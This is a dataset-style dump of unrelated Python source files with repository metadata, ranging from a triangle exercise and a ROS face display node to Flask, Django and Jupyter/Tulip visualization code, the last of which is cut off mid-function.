| 46.875 | 262 | 0.632 | 163 | 1,500 | 5.723926 | 0.576687 | 0.05895 | 0.101822 | 0.137192 | 0.235799 | 0.235799 | 0.235799 | 0.235799 | 0 | 0 | 0 | 0.021496 | 0.224667 | 1,500 | 31 | 263 | 48.387097 | 0.780739 | 0.03 | 0 | 0 | 1 | 0.04 | 0.231246 | 0.037853 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.12 | 0 | 0.24 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6e29068ed65ac299fd2f3be4dbe36b67f90ed76a | 777 | py | Python | Python/Exercícios_Python/036_analisando_triângulo.py | vdonoladev/aprendendo-programacao | 83abbcd6701b2105903b28fd549738863418cfb8 | [
"MIT"
] | null | null | null | Python/Exercícios_Python/036_analisando_triângulo.py | vdonoladev/aprendendo-programacao | 83abbcd6701b2105903b28fd549738863418cfb8 | [
"MIT"
] | null | null | null | Python/Exercícios_Python/036_analisando_triângulo.py | vdonoladev/aprendendo-programacao | 83abbcd6701b2105903b28fd549738863418cfb8 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""036 - Analisando Triângulo
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1oQmCX-HLeaqxWxaz9zsjj-5Na35XtNXM
"""
# Banner for the "triangle existence condition" check.
print('*' * 54)
print('------- Condição de existência de um triângulo -------'.upper())
print('*' * 54)
# Read the three segment lengths from the user.
r1 = float(input('Informe o comprimento da 1ª reta: '))
r2 = float(input('Informe o comprimento da 2ª reta: '))
r3 = float(input('Informe o comprimento da 3ª reta: '))
# Triangle inequality: each side must lie strictly between the difference
# and the sum of the other two sides.
sit_1 = ((r2 - r3) < r1 < (r2 + r3))
sit_2 = ((r1 - r3) < r2 < (r1 + r3))
sit_3 = ((r1 - r2) < r3 < (r1 + r2))
# All three conditions must hold for the segments to form a triangle.
if (sit_1 and sit_2 and sit_3):
    print('PARABÉNS! É possível formar um triângulo com essas retas!')
else:
    print('DESCULPA. Não é possível formar um triângulo com essas retas.')
6e30ca22ea1f8382b671a9a4f2cdc4c1c05f4025 | 2,032 | py | Python | scripts/display.py | priyablue/ros-face-recognition | 210ef17b922224007746336c31139be5945712a3 | [
"MIT"
] | 19 | 2018-11-21T07:32:00.000Z | 2022-01-31T13:01:14.000Z | scripts/display.py | bryandario8/ros_face_recognition | 6c7e0bb51d0fa303d88c4512a36264b639396a23 | [
"MIT"
] | 3 | 2019-08-09T15:57:22.000Z | 2019-08-18T05:13:39.000Z | scripts/display.py | bryandario8/ros_face_recognition | 6c7e0bb51d0fa303d88c4512a36264b639396a23 | [
"MIT"
] | 10 | 2019-01-22T05:04:36.000Z | 2022-03-28T01:39:18.000Z | #!/usr/bin/env python
import cv2
import dlib
import rospy
from sensor_msgs.msg import Image
from cv_bridge import CvBridge, CvBridgeError
from ros_face_recognition.srv import Face
import config
import face_api
_service = "/{}/faces".format(config.topic_name)
class ImageReader:
    """Subscribes to the RGB camera topic, overlays face-service results on
    each frame, and displays the frame with OpenCV.

    NOTE: this file uses Python 2 syntax (`except X, e:` and the print
    statement below) and must run under Python 2.
    """

    def __init__(self):
        self.bridge = CvBridge()
        self.image_sub = rospy.Subscriber("/camera/rgb/image_raw", Image, self.process)

    def process(self, data):
        # Callback invoked for every incoming frame on the subscribed topic.
        try:
            image = self.bridge.imgmsg_to_cv2(data, "bgr8")
            image_h, image_w = image.shape[:2]

            rospy.wait_for_service(_service)
            try:
                faces = rospy.ServiceProxy(_service, Face)
                resp1 = faces()
                faces = resp1.faces
                for f in faces:
                    # f.x/f.y/f.w/f.h are fractional coordinates; scale to pixels.
                    rect = dlib.rectangle(
                        int(f.x * image_w),
                        int(f.y * image_h),
                        int((f.x + f.w) * image_w),
                        int((f.y + f.h) * image_h),
                    )
                    face = face_api.Face(rect)
                    face.details["id"] = f.label
                    face.details["name"] = f.name
                    face.details["gender"] = f.gender
                    face.draw_face(image)
            except rospy.ServiceException, e:
                print "Service call failed: %s" % e

            cv2.imshow("image", image)
            key = cv2.waitKey(1) & 0xFF
            # 'q' quits the node; 's' saves the current frame to disk.
            if key == ord('q'):
                cv2.destroyAllWindows()
                rospy.signal_shutdown("q key pressed")
            elif key == ord('s'):
                cv2.imwrite("output.jpg", image)
        except CvBridgeError as e:
            rospy.logerr(e)
def main():
    """Initialise the ROS node, start the image reader, and spin until shutdown."""
    rospy.init_node(config.topic_name, anonymous=True)
    rospy.loginfo("Listening to images reader")
    ImageReader()
    try:
        rospy.spin()
    except KeyboardInterrupt:
        # Fixed log-message typo: was "Shutting done ...".
        rospy.logwarn("Shutting down ...")
rospy.logwarn("Shutting done ...")
if __name__ == "__main__":
main()
| 27.835616 | 87 | 0.527559 | 228 | 2,032 | 4.535088 | 0.447368 | 0.015474 | 0.029014 | 0.019342 | 0.021277 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009274 | 0.363189 | 2,032 | 72 | 88 | 28.222222 | 0.789799 | 0.009843 | 0 | 0.054545 | 0 | 0 | 0.07459 | 0.010443 | 0 | 0 | 0.001989 | 0 | 0 | 0 | null | null | 0 | 0.145455 | null | null | 0.018182 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6e37681d4257d4b4eb5267582f4c47d37524d490 | 1,485 | py | Python | waymo_kitti_converter/tools/list_generator.py | anhvth/Pseudo_Lidar_V2 | d7a29ffc811e315df25bba2a43acf288d4ceb30e | [
"MIT"
] | null | null | null | waymo_kitti_converter/tools/list_generator.py | anhvth/Pseudo_Lidar_V2 | d7a29ffc811e315df25bba2a43acf288d4ceb30e | [
"MIT"
] | null | null | null | waymo_kitti_converter/tools/list_generator.py | anhvth/Pseudo_Lidar_V2 | d7a29ffc811e315df25bba2a43acf288d4ceb30e | [
"MIT"
] | null | null | null | """
This script generates number list text files
Number list contains stem of filenames
Number list specifies the files used for a certain data split
Prefix:
- training: 0 (training/)
- validation: 1 (training/)
- testing: 2 (testing/)
- domain adaptation training labelled: 4 (training/)
- domain adaptation training unlabelled: 5
- domain adaptation validation labelled: 6 (training/)
- domain adaptation validation unlabelled: 7
- domain adaptation testing: 8
"""
import glob
# Directory containing the KITTI-format label files to index.
path = '/mnt/lustre/share/DSK/datasets/waymo_open_dataset_kitti/training/label_all'
# Output number-list file.
save_pathname = 'val.txt'
# Filename-prefix filters selecting the data split (see module docstring);
# an empty list matches nothing.
prefixes = []
skip_empty = True # set false for testing set
num_files = 100 # set None to take all
def main():
    """Collect the matching label-file stems and write them to save_pathname."""
    # Gather candidate files, sorted within each prefix group.
    matched = []
    for pref in prefixes:
        matched.extend(sorted(glob.glob(path + '/' + pref + '*.txt')))
    if num_files is not None:
        matched = matched[:num_files]

    stems = []
    for fname in matched:
        if skip_empty:
            # Drop label files with no content.
            with open(fname, 'r') as handle:
                if not handle.readlines():
                    print('Skipping', fname)
                    continue
        # Filename stem: basename without the '.txt' extension.
        stems.append(fname.split('/')[-1][:-4])

    with open(save_pathname, 'w') as out:
        out.write(''.join(stem + '\n' for stem in stems))
# Script entry point: only run when executed directly, not on import.
if __name__ == '__main__':
    main()
| 28.018868 | 83 | 0.606061 | 179 | 1,485 | 4.905028 | 0.49162 | 0.091116 | 0.05467 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012369 | 0.292256 | 1,485 | 52 | 84 | 28.557692 | 0.823026 | 0.378451 | 0 | 0 | 1 | 0 | 0.125 | 0.085648 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037037 | false | 0 | 0.037037 | 0 | 0.074074 | 0.037037 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6e38cda93aff0cc16c31c54aff63a14fcefb016a | 361 | py | Python | examples/default/app.py | lucuma/authcode | 91529b6d0caec07d1452758d937e1e0745826139 | [
"MIT"
] | 11 | 2015-01-14T17:12:46.000Z | 2015-11-04T12:41:19.000Z | examples/default/app.py | lucuma/authcode | 91529b6d0caec07d1452758d937e1e0745826139 | [
"MIT"
] | null | null | null | examples/default/app.py | lucuma/authcode | 91529b6d0caec07d1452758d937e1e0745826139 | [
"MIT"
] | 1 | 2016-01-12T14:55:15.000Z | 2016-01-12T14:55:15.000Z | # coding=utf-8
from flask import Flask
from mailshake import ToConsoleMailer, SMTPMailer
from sqlalchemy_wrapper import SQLAlchemy
import settings
# Flask application configured from the settings module.
app = Flask(__name__)
app.config.from_object(settings)

# Database handle bound to the app.
db = SQLAlchemy(settings.SQLALCHEMY_URI, app)

# In debug mode e-mail is printed to the console instead of sent via SMTP.
if settings.DEBUG:
    mailer = ToConsoleMailer()
else:
    mailer = SMTPMailer(**settings.MAILER_SETTINGS)
| 20.055556 | 51 | 0.792244 | 44 | 361 | 6.318182 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003185 | 0.130194 | 361 | 17 | 52 | 21.235294 | 0.882166 | 0.033241 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.363636 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
6e39a3d3b1cd22ab2fba0bba8142913db2f974de | 3,872 | py | Python | VTiger_KPI_Dashboard/docs/models.py | roovyshapiro/VTiger_Sales_Dashboard | c20687ed8cd5aea8df6a6868b94389eb3b069d3a | [
"MIT"
] | null | null | null | VTiger_KPI_Dashboard/docs/models.py | roovyshapiro/VTiger_Sales_Dashboard | c20687ed8cd5aea8df6a6868b94389eb3b069d3a | [
"MIT"
] | null | null | null | VTiger_KPI_Dashboard/docs/models.py | roovyshapiro/VTiger_Sales_Dashboard | c20687ed8cd5aea8df6a6868b94389eb3b069d3a | [
"MIT"
] | null | null | null | from django.db import close_old_connections, models
from django.utils import timezone
class Docs(models.Model):
'''
DOC Example
{
"archivedAt": null,
"collaboratorIds": [
"12345-1234-1234-1234-123456789",
"12345asdf-1234-1234f-1234a-12345a",
],
"collectionId": "797asd6-4568-44560-8456-44asdfe0f",
"createdAt": "2022-04-13T18:32:17.279Z",
"createdBy": {
"avatarUrl": "https://outline-production-attachments.s3-accelerate.amazonaws.com/avatars/234234-7fcd-23423-b1d0-234234/234234-3432-343-2342-234234g",
"color": "#F5BE31",
"createdAt": "2022-03-29T14:40:49.231Z",
"id": "234234-7fcd-2342f-b1d0-2342342fg",
"isAdmin": true,
"isSuspended": false,
"isViewer": false,
"lastActiveAt": "2022-04-29T15:03:39.115Z",
"name": "Roovy Shapiro",
"updatedAt": "2022-04-29T15:03:39.115Z"
},
"deletedAt": null,
"fullWidth": false,
"id": "234234-ae0e-abcd-abc3-234234fgfg",
"lastViewedAt": "2022-04-13T19:35:44.370Z",
"parentDocumentId": "112456-abcd-abcd-abcd-12345678",
"publishedAt": "2022-04-13T18:32:52.768Z",
"revision": 3,
"tasks": {
"completed": 0,
"total": 0
},
"teamId": "c12345-1234-1234-5432-abcdef1234",
"template": false,
"templateId": null,
"text": "https://github.com/roovyshapiro/VTiger_KPI_Dashboard",
"title": "Title",
"updatedAt": "2022-04-13T18:33:00.885Z",
"updatedBy": {
"avatarUrl": "https://outline-production-attachments.s3-accelerate.amazonaws.com/avatars/123123-1234-1234-1234-123123123/123456-1234-1234-1234-abcdef1234",
"color": "#F5BE31",
"createdAt": "2022-03-29T14:40:49.231Z",
"id": "12345asdf-1234-1234f-1234a-12345a",
"isAdmin": true,
"isSuspended": false,
"isViewer": false,
"lastActiveAt": "2022-04-29T15:03:39.115Z",
"name": "Roovy Shapiro",
"updatedAt": "2022-04-29T15:03:39.115Z"
},
"url": "/doc/Title-1234567abcedf",
"urlId": "1234567abcedf"
},
'''
doc_id = models.CharField(max_length=50, null=True,blank=True)
parent_doc_id = models.CharField(max_length=50, null=True,blank=True)
collection_id = models.CharField(max_length=50, null=True,blank=True)
doc_url = models.CharField(max_length=50, null=True,blank=True)
doc_url_id = models.CharField(max_length=50, null=True,blank=True)
team_id = models.CharField(max_length=50, null=True,blank=True)
published_at = models.DateTimeField(null=True,blank=True)
doc_title = models.CharField(max_length=75, null=True,blank=True)
doc_text = models.TextField(null=True,blank=True)
revision = models.IntegerField(null=True,blank=True)
updated_at = models.DateTimeField(null=True,blank=True)
updated_by_name = models.CharField(max_length=50, null=True,blank=True)
updated_by_id = models.CharField(max_length=50, null=True,blank=True)
updated_by_last_active_at = models.DateTimeField(null=True,blank=True)
created_at = models.DateTimeField(null=True,blank=True)
created_by_name = models.CharField(max_length=50, null=True,blank=True)
created_by_id = models.CharField(max_length=50, null=True,blank=True)
created_by_last_active_at = models.DateTimeField(null=True,blank=True)
collaborator_ids = models.TextField(null=True,blank=True)
date_created = models.DateTimeField(auto_now_add=True)
date_modified = models.DateTimeField(auto_now=True)
def __str__(self):
return f'{self.doc_title} - {self.doc_url} - {self.updated_by_name} - {self.updated_at.strftime("%Y-%m-%d %H:%M:%S")}' | 43.505618 | 167 | 0.634298 | 469 | 3,872 | 5.110874 | 0.347548 | 0.063413 | 0.103045 | 0.134752 | 0.570713 | 0.526909 | 0.497288 | 0.465582 | 0.443888 | 0.443888 | 0 | 0.153796 | 0.214101 | 3,872 | 89 | 168 | 43.505618 | 0.633914 | 0.506715 | 0 | 0 | 0 | 0.038462 | 0.064019 | 0.033788 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038462 | false | 0 | 0.076923 | 0.038462 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
6e3c6c2795d6c10cf76f6c2c5c5d805bbbee3c7f | 690 | py | Python | athanor_channels/commands/character.py | volundmush/athanor_channels | 78d9fb7e2432976e4ec7ef54f18f350bf9b96afd | [
"BSD-3-Clause"
] | null | null | null | athanor_channels/commands/character.py | volundmush/athanor_channels | 78d9fb7e2432976e4ec7ef54f18f350bf9b96afd | [
"BSD-3-Clause"
] | null | null | null | athanor_channels/commands/character.py | volundmush/athanor_channels | 78d9fb7e2432976e4ec7ef54f18f350bf9b96afd | [
"BSD-3-Clause"
] | null | null | null | from athanor_channels.commands.base import AbstractChannelAdminCommand, AbstractChannelCommand, AbstractChannelUseCommand
class CharacterChannelCommand(AbstractChannelCommand):
    """Channel alias command scoped to the 'character' channel system."""
    system_key = 'character'
    help_category = "Character Channel Aliases"
    user_controller = 'character'
class CmdCharacterChannelAdmin(AbstractChannelAdminCommand):
    """Channel administration command bound to the '@chanadm' key."""
    account_caller = False
    # NOTE(review): system_key is 'object' here while the sibling commands use
    # 'character' -- confirm this is intentional.
    system_key = 'object'
    key = '@chanadm'

    def user_parse(self, user):
        # Resolve the user argument to a character via the character controller.
        system = self.controllers.get('character')
        return system.find_character(user)
class CmdCharacterChannelUse(AbstractChannelUseCommand):
    """Channel-use command for the 'character' system, bound to '@channel'."""
    account_caller = False
    system_key = 'character'
    key = '@channel'
| 28.75 | 121 | 0.762319 | 60 | 690 | 8.6 | 0.566667 | 0.052326 | 0.069767 | 0.093023 | 0.104651 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.162319 | 690 | 23 | 122 | 30 | 0.892734 | 0 | 0 | 0.25 | 0 | 0 | 0.12029 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.0625 | 0 | 0.9375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
6e3d67388b1fb9c8f386cf40046f0a6da9ecb35e | 1,101 | py | Python | keras/datasets/sin.py | Dlyma/keras-plus | 47793d9af6102a518fb3ce7d68774cfff055e1d5 | [
"MIT"
] | 1 | 2015-08-27T10:24:25.000Z | 2015-08-27T10:24:25.000Z | keras/datasets/sin.py | Dlyma/keras-plus | 47793d9af6102a518fb3ce7d68774cfff055e1d5 | [
"MIT"
] | null | null | null | keras/datasets/sin.py | Dlyma/keras-plus | 47793d9af6102a518fb3ce7d68774cfff055e1d5 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import cPickle
import sys, os
import numpy as np
# written by zhaowuxia @ 2015/5/30
# used for generate linear datasets
def generate_data(sz, T, diff_start, diff_T):
    """Generate `sz` noisy sine sequences of length T+1 and split them into
    inputs X (the first T samples) and targets Y (the final sample).

    Each sequence is sin((t/T + phase) * 2*pi * loops) + noise/T, where the
    phase is random iff diff_start, and loops is random in [1, 10] iff
    diff_T (otherwise fixed to 5).

    Returns a tuple (X, Y) with X of shape (sz, T, 1) and Y of shape (sz, 1).
    """
    two_pi = 2 * np.pi
    # Normalized time grid [0, 1] with T+1 points; identical for every row.
    grid = np.array(range(T + 1)).astype(float) / T

    rows = []
    for _ in range(sz):
        phase = np.random.random() if diff_start else 0
        loops = (np.random.randint(10) + 1) if diff_T else 5
        noise = np.random.random() / T
        rows.append(np.sin((grid + phase) * two_pi * loops) + noise)

    series = np.array(rows).reshape(sz, T + 1, 1)
    return (series[:, :T], series[:, -1])
def load_data(sz, T, path="sin.pkl", diff_start = False, diff_T = False):
    """Load (X, Y) sine-wave data from *path*, generating and caching it
    first when the pickle does not exist yet.

    :param sz: number of sequences expected/generated.
    :param T: sequence length; X has shape (sz, T, 1), Y has shape (sz, 1).
    :param path: pickle cache location.
    :param diff_start: randomize each sequence's phase (forwarded).
    :param diff_T: randomize each sequence's frequency (forwarded).
    :return: tuple (X, Y) of numpy arrays.
    """
    if not os.path.exists(path):
        print(path, 'not exists')
        data = generate_data(sz, T, diff_start, diff_T)
        # BUGFIX: use context managers so the file handles are closed even
        # when pickling fails (they used to leak).
        with open(path, 'wb') as f:
            cPickle.dump(data, f)
    else:
        print(path, 'exists')
        with open(path, 'rb') as f:
            data = cPickle.load(f)
    # Sanity-check that the cached file matches the requested dimensions.
    assert(data[0].shape[0] == sz)
    assert(data[0].shape[1] == T)
    return data #(X, Y)
| 29.756757 | 118 | 0.572207 | 171 | 1,101 | 3.584795 | 0.380117 | 0.019576 | 0.034258 | 0.04894 | 0.159869 | 0.094617 | 0.094617 | 0.094617 | 0 | 0 | 0 | 0.027329 | 0.268847 | 1,101 | 36 | 119 | 30.583333 | 0.734161 | 0.085377 | 0 | 0.066667 | 1 | 0 | 0.026946 | 0 | 0 | 0 | 0 | 0 | 0.066667 | 1 | 0.066667 | false | 0 | 0.1 | 0 | 0.233333 | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6e4194bd543d0d5f156af5693d121c8c22edb424 | 909 | py | Python | 4_review_to_tag.py | carpedm20/movietag | cad4f4685e42fbb279371bc7a41b02f1641278df | [
"MIT"
] | 7 | 2015-05-14T15:21:14.000Z | 2021-02-09T00:49:27.000Z | 4_review_to_tag.py | carpedm20/movietag | cad4f4685e42fbb279371bc7a41b02f1641278df | [
"MIT"
] | null | null | null | 4_review_to_tag.py | carpedm20/movietag | cad4f4685e42fbb279371bc7a41b02f1641278df | [
"MIT"
] | 4 | 2015-02-19T17:42:31.000Z | 2019-02-21T15:29:31.000Z | #!/usr/bin/python
import requests
import json
import sys
from os import listdir
from config import *
from random import shuffle
from func import *
# Reduce each movie's scraped reviews to word-frequency tags and write the
# result to movie_tag.json.  (Python 2 script: uses `print` statements.)
debug = True  # NOTE(review): defined but never used below

# Read the full review dump produced by the previous pipeline step.
f = open('movie_review.json', 'r')
j = json.loads(f.read())
f.close()

movie_dict = {}
movie_dict['data'] = []

count = 0
for i in j['data']:
    print count  # progress indicator (movie index)
    count += 1

    new_j = {}
    info = i['info']
    reviews = i['reviews']
    print len(reviews)

    new_j['info'] = info

    # get_filtered_list comes from `func` (star import above); presumably it
    # tokenizes/filters the review text into a word list -- TODO confirm.
    word_list = get_filtered_list(reviews, is_list=True)

    # Count word frequencies.
    word_dict = {}
    for w in word_list:
        try:
            word_dict[w] += 1
        except:
            word_dict[w] = 1

    # Convert counts to {text, freq} records sorted by ascending frequency.
    word_list = [{'text': i, 'freq': word_dict[i]} for i in word_dict]
    word_list = sorted(word_list, key=lambda k: k['freq'])
    new_j['tags'] = word_list
    movie_dict['data'].append(new_j)

# Write the tag database for the next pipeline step.
f = open('movie_tag.json','w')
json.dump(movie_dict, f)
f.close()
| 16.833333 | 70 | 0.606161 | 142 | 909 | 3.711268 | 0.394366 | 0.091082 | 0.037951 | 0.037951 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005831 | 0.245325 | 909 | 53 | 71 | 17.150943 | 0.762391 | 0.017602 | 0 | 0.055556 | 0 | 0 | 0.085202 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.194444 | null | null | 0.055556 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6e43805a86b056d39a9529d600d31eb9725d1b98 | 9,122 | py | Python | tulipnb/__init__.py | anlambert/tulip_python_jupyter | 75aad4828b6da72ca4ef971b075bb47eb63bd62e | [
"MIT"
] | null | null | null | tulipnb/__init__.py | anlambert/tulip_python_jupyter | 75aad4828b6da72ca4ef971b075bb47eb63bd62e | [
"MIT"
] | null | null | null | tulipnb/__init__.py | anlambert/tulip_python_jupyter | 75aad4828b6da72ca4ef971b075bb47eb63bd62e | [
"MIT"
] | null | null | null | # Python module to use when working with the tulip module in a Jupyter / IPython notebook
# It enables to inline Tulip WebGL graph visualizations in the notebook
# That code is freely inspired from the great mpld3 project
# (see https://github.com/mpld3/mpld3/tree/master/mpld3)
import sys
import base64
import jinja2
import random
import os.path
import tempfile
import shutil
import IPython
from IPython.core.getipython import get_ipython
from IPython.core.display import display as ipythondisplay
from tulip import tlp
TULIPJS_HTML = jinja2.Template("""
<style type="text/css">
.tulip_viz {
height: 400px;
border: 1px solid black;
}
.interactor_button {
position: absolute;
left: 5px !important;
z-index: 10;
}
.center_button {
position: absolute;
right: 0px !important;
top: 0px !important;
z-index: 10;
}
.fullscreen_button {
position: absolute;
right: 0px !important;
top: 45px !important;
z-index: 10;
}
</style>
<link rel="stylesheet" href=""/>
<div id="toolbar-options{{ vizid }}" class="hidden">
<a class="interactor-znp" href="#"><i class="fa fa-hand-paper-o" aria-hidden="true"></i></a>
<a class="interactor-zoom" href="#"><i class="fa fa-search-plus"></i></a>
<a class="interactor-fisheye" href="#"><i class="fa fa-eye"></i></a>
<a class="interactor-neighborhood" href="#"><i class="fa fa-share-alt"></i></a>
</div>
<div id="{{ vizid }}" class="tulip_viz">
<div id="toolbar{{ vizid }}" class="btn-toolbar btn-toolbar-dark interactor_button hidden">
<i class="fa fa-hand-paper-o" aria-hidden="true"></i>
</div>
<div id="center{{ vizid }}" class="btn-toolbar btn-toolbar-dark center_button hidden">
<i class="fa fa-arrows" aria-hidden="true"></i>
</div>
<div id="fullscreen{{ vizid }}" class="btn-toolbar btn-toolbar-dark fullscreen_button hidden">
<i class="fa fa-arrows-alt" aria-hidden="true"></i>
</div>
</div>
<script type="text/javascript">
var hostname = window.location.hostname;
var scriptPaths;
// case where we are running a local notebook server, load required assets from it
if (hostname == "localhost" || hostname == "127.0.0.1") {
scriptPaths = {tulip: "{{ tulipjs_url[:-3] }}",
base64utils: "{{ base64utils_url[:-3] }}",
jquerytoolbar: "{{ jquerytoolbarjs_url[:-3] }}"};
if ($("#jqtoolbarcss").length == 0) {
$("head").append('<link id="jqtoolbarcss" rel="stylesheet" href="{{ jquerytoolbarcss_url }}" type="text/css" />');
}
if ($("#fontawesomecss").length == 0) {
$("head").append('<link id="fontawesomecss" rel="stylesheet" href="{{ fontawesomecss_url }}" type="text/css" />');
}
// otherwise, we assume that we are only rendering a static html notebook through nbviewer
// so load required assets from rawgit (GitHub CDN)
} else {
var cdnPrefix = "https://rawgit.com/anlambert/tulip_python_notebook/master/tulipnb/tulipjs/";
scriptPaths = {tulip: cdnPrefix + "tulip",
base64utils: cdnPrefix + "base64utils",
jquerytoolbar: cdnPrefix + "jquery.toolbar.min"};
if ($("#jqtoolbarcss").length == 0) {
$("head").append('<link id="jqtoolbarcss" rel="stylesheet" href="'+ cdnPrefix + 'css/jquery.toolbar.css" type="text/css" />');
}
if ($("#fontawesomecss").length == 0) {
$("head").append('<link id="fontawesomecss" rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css" type="text/css" />');
}
window.tulipConf = {
modulePrefixURL: cdnPrefix,
filePackagePrefixURL: cdnPrefix,
memoryInitializerPrefixURL: cdnPrefix
};
}
require.config({waitSeconds: 0,
paths: scriptPaths});
require(["tulip", "base64utils", "jquerytoolbar"], function(tulip, base64utils) {
var tulipView = null;
function resizeTulipView() {
if (tulipView && tulipView.fullScreenActivated) return;
if (tulipView) {
tulipView.resize();
}
}
window.addEventListener('resize', resizeTulipView, false);
$("#toolbar-options{{ vizid }}").find(".interactor-znp").on('click', function() {
tulipView.activateInteractor('ZoomAndPan');
});
$("#toolbar-options{{ vizid }}").find(".interactor-zoom").on('click', function() {
tulipView.activateInteractor('RectangleZoom');
});
$("#toolbar-options{{ vizid }}").find(".interactor-neighborhood").on('click', function() {
tulipView.activateInteractor('Neighborhood');
});
$("#center{{ vizid }}").on('click', function() {
tulipView.centerScene();
});
$("#fullscreen{{ vizid }}").on('click', function() {
tulipView.fullScreen();
});
$("#toolbar-options{{ vizid }}").find(".interactor-fisheye").on('click', function() {
tulipView.activateInteractor('Fisheye');
});
$("#toolbar-options{{ vizid }}").find('a').on('click', function() {
$this = $(this);
$button = $('#toolbar{{ vizid }}');
$newClass = $this.find('i').attr('class').substring(3);
$oldClass = $button.find('i').attr('class').substring(3);
if($newClass != $oldClass) {
$button.find('i').animate({
top: "+=50",
opacity: 0
}, 200, function() {
$(this).removeClass($oldClass).addClass($newClass).css({top: "-=100", opacity: 1}).animate({
top: "+=50"
});
});
}
});
$('#toolbar{{ vizid }}').toolbar({
content: '#toolbar-options{{ vizid }}',
position: 'bottom',
style: 'dark',
event: 'click',
hideOnClick: true
});
tulip.init().then(function() {
var tlpbgzGraphBase64 = "{{ tlpbgz_graph_base64 }}";
var tlpbgzGraphBinary = base64utils.base64DecToArr(tlpbgzGraphBase64);
var container = document.getElementById("{{ vizid }}");
tulipView = tulip.View(container);
$("#toolbar{{ vizid }}").removeClass('hidden');
$("#center{{ vizid }}").removeClass('hidden');
$("#fullscreen{{ vizid }}").removeClass('hidden');
tulipView.loadGraphFromData("graph.tlpb.gz", tlpbgzGraphBinary);
tulipView.centerScene();
tulipView.draw();
});
});
</script>
""")
def copyNeededFilesToWebServer():
    """Install the tulipjs assets (JS/CSS) as an IPython/Jupyter nbextension
    and return the URLs under which the notebook server serves them.

    :return: dict mapping asset keys ('tulipjs', 'base64utilsjs',
        'jquerytoolbarjs', 'jquerytoolbarcss', 'fontawesomecss') to
        '/nbextensions/tulipjs/...' URLs.
    """
    nbextension = True
    try:
        # install_nbextension moved from IPython.html to the separate
        # `notebook` package in IPython/Jupyter 4.
        if IPython.version_info[0] >= 4:
            from notebook import install_nbextension
        else:
            from IPython.html import install_nbextension
    except ImportError:
        nbextension = False
    moduleDir = os.path.dirname(os.path.abspath(__file__))
    tulipjs_files = os.path.join(moduleDir, 'tulipjs')
    required_files = [tulipjs_files]
    if nbextension:
        def _install_nbextension(extensions):
            """Wrapper for IPython.html.install_nbextension."""
            # IPython 3+ installs one extension per call, at user level.
            if IPython.version_info[0] >= 3:
                for extension in extensions:
                    install_nbextension(extension, user=True, verbose=0)
            else:
                install_nbextension(extensions, verbose=0)
        try:
            _install_nbextension(required_files)
        except IOError:
            # files may be read only. We'll try deleting them and re-installing
            from IPython.utils.path import get_ipython_dir
            nbext = os.path.join(get_ipython_dir(), "nbextensions")
            for req_file in required_files:
                dest = os.path.join(nbext, os.path.basename(req_file))
                if os.path.exists(dest):
